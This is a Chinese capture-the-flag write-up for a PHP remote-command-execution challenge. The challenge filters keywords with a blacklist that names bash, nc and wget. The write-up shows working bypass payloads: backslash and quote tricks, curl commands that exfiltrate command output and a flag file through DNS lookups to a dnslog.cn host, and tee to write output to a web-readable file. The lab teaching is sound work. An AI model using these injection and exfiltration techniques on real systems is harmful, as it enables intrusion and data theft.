[SWPUCTF 2021 新生赛]finalrce

[SWPUCTF 2021 新生赛]finalrce wp

注:本文参考了 NSSCTF Leaderchen 师傅的题解,并修补了其中些许不足。

此外,参考了 命令执行(RCE)面对各种过滤,骚姿势绕过总结

题目代码:

复制代码
 <?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
} 

过滤了一堆字符。

这道题的 exec 函数理应返回执行结果的最后一行,但是却什么也不返回,所以需要一些其他的方法来看到命令执行的结果。

过滤关键字的绕过

首先我们知道关键字被过滤时可以使用以下绕过方式:

如 ls 被过滤,可以替换为

复制代码
l''s

l\s 

等等。

但是由于 $* 等字符被过滤了,这里能用的恐怕只有前两种。

了解了这些之后来构造几种 payload 。

DNSlog 带外命令执行

DNS 的网站这里写一下:

http://www.dnslog.cn

http://ceye.io

临时使用的话推荐去第一个网站。

复制代码
curl `l''s`.xf3njn.dnslog.cn

用反引号执行 ls 命令,执行的结果拼接到 xf3njn.dnslog.cn 域名上,然后访问,访问的日志可以在网站上看,就可以看到命令执行的结果。

ls 执行的结果是 index.php

这样的话我们直接查找根目录下包含 "f" 的文件:

复制代码
curl `l\s /|grep 'f'`.xf3njn.dnslog.cn

返回结果:

找到了。

查看 flag 文件:

这里因为 "la" 也被过滤了,所以多加了一个斜杠。

复制代码
curl `ca\t /flllll\aaaaaaggggggg`.xf3njn.dnslog.cn

返回结果中的大括号被去掉了,自己加上,另外把开头小写的 nssctf 改成大写就行了。

tee 关键字将结果保存到文件中

执行 ls 文件并将结果保存到当前目录的 1.txt 文件中:

复制代码
l\s|tee 1.txt

执行这条命令后去访问:http://node4.anna.nssctf.cn:28616/1.txt 就可以看到结果了:

这里因为我之前执行过一次,所以多了一个 1.txt 文件。

同理可以查看 flag :

复制代码
ca\t /flllll\aaaaaaggggggg|tee 2.txt

拿到 flag :

此外,还有 tac,head,tail 等命令也可以代替 cat 查看文件内容。

相关推荐
老六ip加速器3 小时前
手机ip隔离方法
tcp/ip·智能手机·php
内心如初4 小时前
应急响应事件处理(网络安全体系架构与应急响应的前置知识)
安全·web安全
rockmelodies6 小时前
【PHP7内核剖析】-1.3 FPM
php
真正的醒悟10 小时前
上网管理行为-ISP路由部署
服务器·php·接口隔离原则
Suckerbin16 小时前
TBBT: FunWithFlags靶场渗透
笔记·安全·web安全·网络安全
张晓~1833994812117 小时前
短视频矩阵源码-视频剪辑+AI智能体开发接入技术分享
c语言·c++·人工智能·矩阵·c#·php·音视频
jieyu111917 小时前
反序列化漏洞详解
网络安全·漏洞原理
2zcode18 小时前
基于Matlab可见光通信系统中OOK调制的误码率性能建模与分析
算法·matlab·php
rockmelodies19 小时前
【PHP7内核剖析】-1.1 PHP概述
开发语言·php
Codingwiz_Joy20 小时前
Day43 PHP(mysql不同注入类型、mysql不同注入点、mysql传输不同数据类型 )
网络安全·php·安全性测试